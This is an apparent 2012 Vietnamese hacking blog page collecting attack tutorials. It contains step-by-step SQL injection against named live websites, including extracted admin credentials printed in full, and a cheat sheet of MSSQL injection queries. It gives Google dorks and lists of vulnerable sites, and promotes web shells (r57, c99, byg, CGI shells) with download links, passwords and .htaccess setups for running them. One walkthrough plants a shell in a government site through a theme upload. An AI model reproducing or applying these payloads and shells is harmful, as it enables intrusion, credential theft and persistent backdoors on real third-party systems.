29 thg 6, 2012
SQLI - Khai Thác Đối Với ASPX
Victim: http://quangcaovinasun.com.vn
Bước 1: Check link lỗi
Đối với site aspx, ta thêm dấu ‘ cuối đường link có các ký tự dạng ID=, Sp=…. Nếu thấy site xuất hiện lỗi:
Unclosed quotation mark after the character string ''
Chứng tỏ site dính lỗi SQLI.
Ví dụ: http://quangcaovinasun.com.vn/ProductDetail.aspx?MaSP=42’ Bước 2: Truy vấn tên các table
Xuất hiện thông tin tên table thứ nhất: “tbl_DangNhap”.
Conversion failed when converting the nvarchar value 'tbl_DangNhap' to data type int.
Tiếp tục truy vấn:
Conversion failed when converting the nvarchar value 'tbl_DiaChi' to data type int.
Tiếp tục,
Conversion failed when converting the nvarchar value 'tbl_DoiTac' to data type int.
Làm tương tự cho tới khi xuất hiện table user chứa thông tin username và password. Ở site này table chứa thông admin đăng nhập của admin là table đầu tiên: Tbl_DangNhap
Bước 3 : Truy vấn tên các columns
Như thông tin khai thác được ở trên. Table chứa thông tin username và password chính là table: tbl_DangNhap. Chính vì vậy ta sẽ khai thác table này.
Conversion failed when converting the nvarchar value 'ID' to data type int.
http://quangcaovinasun.com.vn/ProductDetail.aspx?MaSP=42 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('tbl_DangNhap') and column_name not in ('ID')))-- -
Conversion failed when converting the nvarchar value 'TenDN' to data type int.
http://quangcaovinasun.com.vn/ProductDetail.aspx?MaSP=42 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('tbl_DangNhap') and column_name not in ('ID','TenDN')))-- -
Conversion failed when converting the nvarchar value 'Matkhau' to data type int.
Bước 4: Khai Thác thông tin username và password
- Thông tin username:
Conversion failed when converting the nvarchar value 'loimv' to data type int.
- Thông tin password
Conversion failed when converting the nvarchar value 'maihoanglinh@' to data type int
- Hoặc get cả username và password
Conversion failed when converting the nvarchar value 'loimv/maihoanglinh@' to data type int
Bước 5: Tìm link admin và đăng nhâp
Sử dụng tool havij hoặc web admin finder, đã được giới thiệu ở bài 2:
Ta được link admin:
admin: loimv
password: maihoanglinh@
Kết Luận Các Query SQLI Trong Aspx Cần Lưu Ý
1- Get the version:
and 1=convert(int,@@version)-- -
2- Get Server Name
and 1=convert(int,@@servername)-- -
3- Get data base name:
and 1=convert(int,db_name())-- -
4- Get system user
and 1=convert(int,system_user) -- -
5- Get table thứ nhất
and 1=convert(int,(select top 1 table_name from information_schema.tables))-- -
6- Get table thứ 2:
and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ("FIRST-TABLE-HERE")))-- -
7- Get table thứ 3 :
and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ("Second-Table-Here")))-- -
8- Get đến table user để lấy thông tin đăng nhập của admin
10 - Get column thứ nhất từ table chứa admin :
and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=("TABLE-NAME-HERE")))-- -
11- Get column thứ nhất từ table chứa admin :
and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=("TABLE-NAME-HERE")
and column_name not in ("FIRST-COLUMNS-HERE")))-- -
12- Get cho hết các columns cần lấy thông tin
13- Xuất ra thông tin username và password
and 1=convert(int,(select top 1 column-name-1%2b’/’%2bcolumn-name-2 from TABLE-NAME-HERE))-- -
[Google Dork] SQl - Public 16/6
Google Dork : inurl:Default.aspx?PageID=
Dang khai thác đối với aspx ở dork này tương tự như trong tut sau:
Sau đây là 1 số site dính lỗi này:
Tham khảo: http://1337day.com/exploits/18665
HOT- Giới Thiệu Tính Năng 1 Sô Shell
Nói đến local là nói đến shell, không có shell thì chỉ local bằng niềm tin. Hôm nay soleil giới thiệu một số loại shell thông dụng không thể thiếu trong local attack
Một số shell thông dụng:
Pass Download tất cả là :soleil_vhb
r57.php
R57 hiện nay đang là shell thông dụng, được sử dụng phổ biến nhất với hầu như là đầy đủ các tính năng.
c99.php
Nói đến r57 cũng không thể không nhắc đến c99 với các thao tác có sẵn trên shell mà không cần phải sử dụng lệnh: edit, del, insert, drop… đặc biệt là có khả năng dump cơ sở dữ liệu
byg.php
Byg hiện đang là shell mà được soleil sử dụng nhiều nhất với các chức năng có sẵn và thao tác dễ sử dụng
pass login: byg
vhb.php
Con shell này đã được soleil Edit và Deveple bằng chính con shell Byg.php trên với 1 số tính năng mạnh hơn và giao diện đẹp, bắt mắt hơn. Đây là con shell chính mà soleil thường sử dụng nhất.
http://www.mediafire.com/?hr9acl1yd1eabcw
Pass login: vhb
soleil.pin Nếu Server Safe_mod: ON, cả shell r57 và c99 đều không có chức năng run command để thực thi các câu lệnh, vậy làm sao có thể local được. Giải pháp được nghĩ đến là sử dụng shell cgi mà chức năng chính của nó là thực thi các câu lệnh.
Pass login: ducdung.08clc
Cách sử dụng:
- Up shell soleil.pin và chmod nó về 755
- Up hoặc tạo file .htaccess có nội dung:
## START ##Options +ExecCGIAddHandler cgi-script cgi pl cgi gmc pin jpgRewriteEngine onRewriteRule (.*)\.mil$ $1.cgiOptions +FollowSymLinksDirectoryIndex cmd.htmlOptions +IndexesRemoveHandler .hackAddType text/plain .hack## milw0rmvn exploit ##
Hoặc:
Options FollowSymLinks MultiViews Indexes ExecCGIAddType application/x-httpd-cgi .cinAddHandler cgi-script .pinAddHandler cgi-script .pin
- telnet.php
Để sử dụng shell cgi được thuận tiên hơn, soleil giới thiệu shell telnet.pl. Chức năng hoàn toàn tương tự với con shell soleil.pin
Tuy nhiên cách thức sử dụng nó thì đơn giản hơn nhiều vì không phải sử dụng đến file .htaccess mà chỉ cần chmod nó về 755 là run ngon.
Face symlink:
Get user:
Get user và domain
Shell này cần chmod về 755 trước khi sử dụng
Get all config
SSI
Backdoor.php
Netcut
zipcode.php
r57bypass.php (vip)
Check Shell : Kiểm tra shell có trên site
Priv8_2012.php
saoluu.php
Shell xml: Up shell đối với vbulletin
root.tar.gz: Dùng để sym root hay indirect sym
Và rất nhiều shell khác với 1 số tính năng đặc biệt khác nữa.
[Bug] WebX (showsubpage.asp) SQLI
1. Google dork:
inurl:"showsubpage.asp" "Powered By: WebX"
2. Khai thác
- Thêm Query
null+and+1=2+union+select+1,2,3,4,5,pass,login,8,9,10,11,12,13,14,15,16,17+from+admin+where+id=1
vào sau http://www.victim.com/showsubpage.asp?subid=
- Nếu site dính bug này, nó sẽ hiện thi thông tin username và password được mã hóa MD5 của admin
Ví dụ:
http://www.erdf.edu.in/showsubpage.asp?subid=null+and+1=2+union+select+1,2,3,4,5,pass,login,8,9,10,11,12,13,14,15,16,17+from+admin+where+id=1
- Để giải mã pass bị mã hóa md5 đó, bạn có thể vứt đoạn mã đó lên google
3- Login
Login vào quyền admin với path mặc định: http://www.victim.com/admin
http://www.erdf.edu.in/admin/
* List một số site dính bug này:
http://d7091642.u41.c7.ixwebhosting.com/showsubpage.asp?subid=null+and+1=2+union+select+1,2,3,4,5,pass,login,8,9,10,11,12,13,14,15,16,17+from+admin+where+id=1
Up Shell Voi NuKeViet
Victim : http://dansodaklak.gov.vn
Bước 1: Đăng nhập với quyền quản trị
Bước 2: Upload Themes
Vào “Quản lý giao diên” => “Cài đặt themes"
"
"
Chọn: “Cài đặt themes lên hệ thống”
Nén gói themes cần upload dưới dạng zip rồi up lên.
Lưu ý: Trong gói themes upload lên hãy chèn 1 con shell và nhơ đường dẫn của con shell đó, Ví dụ:
Soleil chèn 1 con shell byg.php trong thư mục images và có path là: /nuke/images/byg.php
Link download: http://www.mediafire.com/?c5nnn69nwbq749b
Pass dai nén: soleil_vhb
Đây là các file và forder của themes được upload lên trong đó co con shell byg.php
Tiếp tục chọn “Kiểm Tra” và hoàn thành các bước cài đặt còn lại.
Bươc 3: Run Shell
Như đã nói ở trên shell byg.php được chèn vào có path là: /nuke/images/byg.php
Nên, Link shell sẽ là:
Bài viết này soleil viết mục đich là tham khảo:
- Username và password có được do local attack
- Link shell đã được đặt pass kỹ càn nhằm tránh người ngoài vào phá hoại
- Các file, thư mục quan trong đã đươc soleil config hết.
- Đã thông báo với bên lien quan ( Vì site lien quan đến GOV)